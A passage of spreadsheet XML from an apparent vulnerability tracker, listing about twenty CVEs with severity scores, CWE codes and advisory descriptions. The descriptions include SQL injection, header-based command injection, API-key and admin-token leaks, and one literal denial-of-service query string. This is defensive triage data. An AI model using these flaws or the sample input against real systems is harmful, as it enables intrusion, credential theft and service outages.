      <c r="E1246" s="5" t="inlineStr"/>
      <c r="F1246" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1246" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1246" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I1246" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1246" s="5" t="inlineStr"/>
      <c r="K1246" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1246" s="5" t="inlineStr">
        <is>
          <t>CommServe contained a heap-based buffer overflow issue affecting service availability. Software customers upgrade to resolved maintenance release. Update CommServe.</t>
        </is>
      </c>
      <c r="M1246" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77102</t>
        </is>
      </c>
    </row>
    <row r="1247">
      <c r="A1247" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1247" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77103</t>
        </is>
      </c>
      <c r="C1247" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1247" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1247" s="5" t="inlineStr"/>
      <c r="F1247" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1247" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1247" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I1247" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1247" s="5" t="inlineStr"/>
      <c r="K1247" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="L1247" s="5" t="inlineStr">
        <is>
          <t>CommServe contained an authentication bypass issue affecting access authorization and information disclosure. Software customers upgrade to resolved maintenance release. Update CommServe.</t>
        </is>
      </c>
      <c r="M1247" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77103</t>
        </is>
      </c>
    </row>
    <row r="1248">
      <c r="A1248" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1248" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77105</t>
        </is>
      </c>
      <c r="C1248" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1248" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1248" s="5" t="inlineStr"/>
      <c r="F1248" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1248" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1248" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I1248" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1248" s="5" t="inlineStr"/>
      <c r="K1248" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L1248" s="5" t="inlineStr">
        <is>
          <t>CommServe contained a cryptographic signature verification issue affecting privilege management. Software customers upgrade to resolved maintenance release. Update CommServe and Web Server.</t>
        </is>
      </c>
      <c r="M1248" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77105</t>
        </is>
      </c>
    </row>
    <row r="1249">
      <c r="A1249" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1249" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77111</t>
        </is>
      </c>
      <c r="C1249" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1249" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1249" s="5" t="inlineStr"/>
      <c r="F1249" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1249" s="5" t="inlineStr"/>
      <c r="H1249" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="I1249" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1249" s="5" t="inlineStr"/>
      <c r="K1249" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1249" s="5" t="inlineStr">
        <is>
          <t>Adobe Commerce is affected by an Incorrect Authorization vulnerability that could result in a Security feature bypass. An attacker with high privileges could leverage this vulnerability to bypass security measures and gain unauthorized write access, causing a limited disruption to availability. Exploitation of this issue does not require user interaction. Scope is changed.</t>
        </is>
      </c>
      <c r="M1249" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77111</t>
        </is>
      </c>
    </row>
    <row r="1250">
      <c r="A1250" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1250" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77120</t>
        </is>
      </c>
      <c r="C1250" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1250" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1250" s="5" t="inlineStr"/>
      <c r="F1250" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1250" s="5" t="inlineStr"/>
      <c r="H1250" s="5" t="inlineStr"/>
      <c r="I1250" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1250" s="5" t="inlineStr"/>
      <c r="K1250" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1250" s="5" t="inlineStr">
        <is>
          <t>CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability exists that could cause privilege escalation to root and unauthorized execution of administrative functions when an authenticated user with SSH enabled interacts with the operating system console that improperly processes user-controlled input.</t>
        </is>
      </c>
      <c r="M1250" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77120</t>
        </is>
      </c>
    </row>
    <row r="1251">
      <c r="A1251" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1251" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77298</t>
        </is>
      </c>
      <c r="C1251" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1251" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1251" s="5" t="inlineStr"/>
      <c r="F1251" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1251" s="5" t="inlineStr"/>
      <c r="H1251" s="5" t="inlineStr"/>
      <c r="I1251" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J1251" s="5" t="inlineStr"/>
      <c r="K1251" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1251" s="5" t="inlineStr">
        <is>
          <t>SeaweedFS is a distributed storage system for files and blobs. In versions 4.39 and earlier, the S3 API accepts an external OIDC JWT sent directly in the Authorization header and maps it to an IAM role without enforcing that role's trust policy, so a federated user can assume a role they are not permitted to hold. The standard STS AssumeRoleWithWebIdentity path rejects such a token when the role's trust policy does not trust the token's federated provider, but the direct S3 bearer path validates only the token itself and then authenticates as the mapped role and evaluates that role's attached S3 permissions. As a result, a valid OIDC user whose token would be denied the role through STS can obtain the role's S3 access, including object read, write, and delete, by presenting the raw OIDC JWT directly to the S3 API. This issue is fixed in version 4.40</t>
        </is>
      </c>
      <c r="M1251" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77298</t>
        </is>
      </c>
    </row>
    <row r="1252">
      <c r="A1252" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1252" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77354</t>
        </is>
      </c>
      <c r="C1252" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1252" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1252" s="5" t="inlineStr"/>
      <c r="F1252" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1252" s="5" t="inlineStr"/>
      <c r="H1252" s="5" t="inlineStr"/>
      <c r="I1252" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J1252" s="5" t="inlineStr"/>
      <c r="K1252" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-789</t>
        </is>
      </c>
      <c r="L1252" s="5" t="inlineStr">
        <is>
          <t>kin-openapi is a Go project for handling OpenAPI files. From 0.124.0 until 0.142.0, openapi3filter.sliceMapToSlice in openapi3filter/req_resp_decoder.go converts attacker-controlled sparse indexes from a deepObject query parameter into a dense slice by allocating entries from zero through the largest supplied index, after which buildResObj creates another slice of the same length. This allocation occurs before schema validation, so maxItems does not prevent it. An unauthenticated client can send a small query such as param[items][50000000]=x to an endpoint whose deepObject schema contains an array, forcing multi-gigabyte heap allocation and causing an OOM kill or restart loop. Other request-body encodings and styled parameters that do not produce bracketed integer indexes are not affected. This issue is fixed in version 0.142.0.</t>
        </is>
      </c>
      <c r="M1252" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77354</t>
        </is>
      </c>
    </row>
    <row r="1253">
      <c r="A1253" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1253" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77357</t>
        </is>
      </c>
      <c r="C1253" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1253" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1253" s="5" t="inlineStr"/>
      <c r="F1253" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1253" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1253" s="5" t="inlineStr"/>
      <c r="I1253" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J1253" s="5" t="inlineStr"/>
      <c r="K1253" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-834</t>
        </is>
      </c>
      <c r="L1253" s="5" t="inlineStr">
        <is>
          <t>Mesop is a Python-based UI framework that allows users to build web applications. Prior to 1.3.3, applications running in debug mode expose a GET /hot-reload endpoint whose unbounded loop depends on the user-supplied counter parameter, allowing an unauthenticated attacker to hold worker threads with high counter values until the worker pool is exhausted and the server becomes unavailable. A single unauthenticated attacker can crash the Mesop server with minimal effort. Because the attack leverages worker exhaustion, the server remains unresponsive until it is manually restarted. This issue is fixed in version 1.3.3.</t>
        </is>
      </c>
      <c r="M1253" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77357</t>
        </is>
      </c>
    </row>
    <row r="1254">
      <c r="A1254" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1254" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77393</t>
        </is>
      </c>
      <c r="C1254" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1254" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1254" s="5" t="inlineStr"/>
      <c r="F1254" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1254" s="5" t="inlineStr"/>
      <c r="H1254" s="5" t="inlineStr"/>
      <c r="I1254" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1254" s="5" t="inlineStr"/>
      <c r="K1254" s="5" t="inlineStr">
        <is>
          <t>CWE-276</t>
        </is>
      </c>
      <c r="L1254" s="5" t="inlineStr">
        <is>
          <t>In Ignition 8.1.53 and earlier, the Gateway "Create Project Role(s)" setting shipped blank, which permitted any authenticated user to create projects (if they can execute gateway scripts). Ignition 8.1.54 restricts project creation to Designer sessions and no longer relies on this setting. The 8.3 series is not affected.</t>
        </is>
      </c>
      <c r="M1254" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77393</t>
        </is>
      </c>
    </row>
    <row r="1255">
      <c r="A1255" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1255" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79707</t>
        </is>
      </c>
      <c r="C1255" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1255" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1255" s="5" t="inlineStr"/>
      <c r="F1255" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1255" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1255" s="5" t="inlineStr"/>
      <c r="I1255" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1255" s="5" t="inlineStr"/>
      <c r="K1255" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1255" s="5" t="inlineStr">
        <is>
          <t>A Path Traversal vulnerability in the builder endpoint in Google Cloud Agent Development Kit (ADK) versions 1.9.0 through 1.21.0 on Python allows an unauthenticated remote attacker to read arbitrary files using a crafted file_path query parameter.</t>
        </is>
      </c>
      <c r="M1255" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79707</t>
        </is>
      </c>
    </row>
    <row r="1256">
      <c r="A1256" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1256" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79756</t>
        </is>
      </c>
      <c r="C1256" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1256" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1256" s="5" t="inlineStr"/>
      <c r="F1256" s="5" t="n">
        <v>0.051</v>
      </c>
      <c r="G1256" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H1256" s="5" t="inlineStr"/>
      <c r="I1256" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J1256" s="5" t="inlineStr"/>
      <c r="K1256" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1256" s="5" t="inlineStr">
        <is>
          <t>Nuclio is a "Serverless" framework for Real-Time Events and Data Processing. Prior to version 1.17.4, the fix for unauthenticated OS command injection in the nuclio dashboard on the local/Docker platform is incomplete. The fix added validateFunctionName for function names and common.Quote() for the named-resource shell command path, but the list-all resource path (triggered when no specific resource name is provided) still interpolates the resourceNamespace parameter unquoted into a /bin/sh -c command string. An unauthenticated attacker can inject shell metacharacters via the X-Nuclio-Function-Namespace, X-Nuclio-Project-Namespace, or X-Nuclio-Function-Event-Namespace HTTP headers to achieve arbitrary command execution inside the dashboard container. This issue has been patched in version 1.17.4.</t>
        </is>
      </c>
      <c r="M1256" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79756</t>
        </is>
      </c>
    </row>
    <row r="1257">
      <c r="A1257" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1257" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79987</t>
        </is>
      </c>
      <c r="C1257" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1257" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1257" s="5" t="inlineStr"/>
      <c r="F1257" s="5" t="inlineStr"/>
      <c r="G1257" s="5" t="inlineStr"/>
      <c r="H1257" s="5" t="inlineStr"/>
      <c r="I1257" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1257" s="5" t="inlineStr"/>
      <c r="K1257" s="5" t="inlineStr">
        <is>
          <t>CWE-470</t>
        </is>
      </c>
      <c r="L1257" s="5" t="inlineStr">
        <is>
          <t>A remote, authenticated, non-admin Craft CMS Control Panel user with only the accessCp permission can execute operating system commands as the PHP web worker.</t>
        </is>
      </c>
      <c r="M1257" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79987</t>
        </is>
      </c>
    </row>
    <row r="1258">
      <c r="A1258" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1258" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79989</t>
        </is>
      </c>
      <c r="C1258" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1258" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1258" s="5" t="inlineStr"/>
      <c r="F1258" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1258" s="5" t="inlineStr"/>
      <c r="H1258" s="5" t="inlineStr"/>
      <c r="I1258" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J1258" s="5" t="inlineStr"/>
      <c r="K1258" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="L1258" s="5" t="inlineStr">
        <is>
          <t>The vulnerability allows any authenticated user to change their own password without providing the current password or having an active elevated session. It also allows the attacker to change other users’ passwords if the attacker’s account has Edit users permission (which doesn’t allow changing others’ passwords) and lacks Administrate users permission (which is required to change others’ passwords).</t>
        </is>
      </c>
      <c r="M1258" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79989</t>
        </is>
      </c>
    </row>
    <row r="1259">
      <c r="A1259" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1259" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81640</t>
        </is>
      </c>
      <c r="C1259" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1259" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1259" s="5" t="inlineStr"/>
      <c r="F1259" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1259" s="5" t="inlineStr"/>
      <c r="H1259" s="5" t="inlineStr"/>
      <c r="I1259" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1259" s="5" t="inlineStr"/>
      <c r="K1259" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="L1259" s="5" t="inlineStr">
        <is>
          <t>An attacker could derive the camera's Wi-Fi password and connect to its wireless network. This weakens or eliminates the security value of the access-point password and may expose the live video stream, device services, status interfaces, and firmware-update functionality.</t>
        </is>
      </c>
      <c r="M1259" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81640</t>
        </is>
      </c>
    </row>
    <row r="1260">
      <c r="A1260" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1260" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82064</t>
        </is>
      </c>
      <c r="C1260" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1260" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1260" s="5" t="inlineStr"/>
      <c r="F1260" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1260" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H1260" s="5" t="inlineStr"/>
      <c r="I1260" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1260" s="5" t="inlineStr"/>
      <c r="K1260" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="L1260" s="5" t="inlineStr">
        <is>
          <t>A security issue in MongoDB Server allows an unauthenticated network user to cause a denial of service on a specific type of replica set member. The server contains an assertion in its read concern processing logic that can be reached without authentication, and the assertion's assumptions about internal state do not hold for all member configurations, causing the server process to terminate.</t>
        </is>
      </c>
      <c r="M1260" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82064</t>
        </is>
      </c>
    </row>
    <row r="1261">
      <c r="A1261" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1261" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82075</t>
        </is>
      </c>
      <c r="C1261" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1261" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1261" s="5" t="inlineStr"/>
      <c r="F1261" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1261" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H1261" s="5" t="inlineStr"/>
      <c r="I1261" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1261" s="5" t="inlineStr"/>
      <c r="K1261" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L1261" s="5" t="inlineStr">
        <is>
          <t>An uncontrolled resource consumption weakness exists in the request-handling path of the MongoDB sharded-cluster router process. A client that has network access to a router port and has not authenticated can supply connection-monitoring parameters that cause the server to expend CPU resources without any rate limiting, degrading or denying service to legitimate clients. No authentication, elevated privileges, or user interaction is required. Only availability is affected; data confidentiality and integrity are not impacted.</t>
        </is>
      </c>
      <c r="M1261" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82075</t>
        </is>
      </c>
    </row>
    <row r="1262">
      <c r="A1262" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1262" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82538</t>
        </is>
      </c>
      <c r="C1262" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1262" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1262" s="5" t="inlineStr"/>
      <c r="F1262" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1262" s="5" t="inlineStr"/>
      <c r="H1262" s="5" t="inlineStr"/>
      <c r="I1262" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1262" s="5" t="inlineStr"/>
      <c r="K1262" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1262" s="5" t="inlineStr">
        <is>
          <t>ILIAS before versions 9.22, 10.10, and 11.3 contains a SQL injection vulnerability in the repository trash table where the table navigation sort field from HTTP requests is passed directly into the ORDER BY clause of a SQL query without validation against declared sortable columns. Authenticated users with write permission on any container can inject arbitrary SQL through the sort parameter, and because multi-statement execution is enabled in the database layer, stacked queries enable full database read and write access as well as administrator account takeover.</t>
        </is>
      </c>
      <c r="M1262" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82538</t>
        </is>
      </c>
    </row>
    <row r="1263">
      <c r="A1263" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1263" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82639</t>
        </is>
      </c>
      <c r="C1263" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1263" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1263" s="5" t="inlineStr"/>
      <c r="F1263" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1263" s="5" t="inlineStr"/>
      <c r="H1263" s="5" t="inlineStr"/>
      <c r="I1263" s="5" t="inlineStr">
        <is>
          <t>2026-08-30</t>
        </is>
      </c>
      <c r="J1263" s="5" t="inlineStr"/>
      <c r="K1263" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L1263" s="5" t="inlineStr">
        <is>
          <t>NextChat versions from 2.15.8 through 2.16.1 contain an improper URL validation vulnerability in the proxy endpoint that allows attackers to obtain the server's OpenAI API key. The x-base-url header is validated using substring matching instead of hostname parsing, allowing any URL containing 'api.openai.com' to pass validation and receive the server's credentials in the Authorization header.</t>
        </is>
      </c>
      <c r="M1263" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82639</t>
        </is>
      </c>
    </row>
    <row r="1264">
      <c r="A1264" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1264" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82882</t>
        </is>
      </c>
      <c r="C1264" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1264" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1264" s="5" t="inlineStr"/>
      <c r="F1264" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1264" s="5" t="inlineStr"/>
      <c r="H1264" s="5" t="inlineStr"/>
      <c r="I1264" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J1264" s="5" t="inlineStr"/>
      <c r="K1264" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1264" s="5" t="inlineStr">
        <is>
          <t>Devtron through 2.2.0 fails to enforce authorization checks on the GET /orchestrator/api-token/webhook endpoint, allowing authenticated users to retrieve admin API tokens. Attackers with any authenticated account can query the endpoint with arbitrary project, environment, and application parameters to retrieve plaintext super-admin JWT tokens for full platform control.</t>
        </is>
      </c>
      <c r="M1264" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82882</t>
        </is>
      </c>
    </row>
    <row r="1265">
      <c r="A1265" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1265" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83605</t>
        </is>
      </c>
      <c r="C1265" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1265" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1265" s="5" t="inlineStr"/>
      <c r="F1265" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1265" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1265" s="5" t="inlineStr"/>
      <c r="I1265" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1265" s="5" t="inlineStr"/>
      <c r="K1265" s="5" t="inlineStr">
        <is>
          <t>CWE-91</t>
        </is>
      </c>
      <c r="L1265" s="5" t="inlineStr">
        <is>
          <t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. Prior to @xmldom/xmldom versions 0.8.14 and 0.9.11, and in xmldom version 0.6.0 and earlier, Element.setAttribute() calls the private _createAttribute(name) path without validating the attribute name, while Document.createAttribute(name) validates against QName. XMLSerializer.serializeToString() emits attribute names verbatim, and requireWellFormed: true did not validate them, so a crafted name can terminate the intended attribute and inject additional attributes, including event handlers, into browser-consumed output; synthesized xmlns:PREFIX declarations expose the same unchecked-name boundary. This issue is fixed in @xmldom/xmldom versions 0.8.14 and 0.9.11; no fixed version is available for xmldom.</t>
        </is>
      </c>
      <c r="M1265" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83605</t>
        </is>
      </c>
    </row>
    <row r="1266">
      <c r="A1266" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1266" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83606</t>
        </is>
      </c>
      <c r="C1266" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1266" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1266" s="5" t="inlineStr"/>
      <c r="F1266" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1266" s="5" t="inlineStr">
        <is>
          <t>java, node.js</t>
        </is>
      </c>
      <c r="H1266" s="5" t="inlineStr"/>
      <c r="I1266" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1266" s="5" t="inlineStr"/>
      <c r="K1266" s="5" t="inlineStr">
        <is>
          <t>CWE-1333, CWE-400</t>
        </is>
      </c>
      <c r="L1266" s="5" t="inlineStr">
        <is>
          <t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. From 0.9.0-beta.9 until 0.9.11, the processing-instruction production in lib/grammar.js lets the greedy S+ separator and lazy Char*? data group repeatedly repartition a long whitespace tail when the required closing ?&gt; is absent. Both parsePI and parseProcessingInstruction apply the expression to the entire remaining source, causing quadratic backtracking during DOMParser.parseFromString() under default options and allowing a small unauthenticated XML input to stall the Node.js event loop. This issue is fixed in @xmldom/xmldom version 0.9.11.</t>
        </is>
      </c>
      <c r="M1266" s="6" t="inlineStr">
        <is>
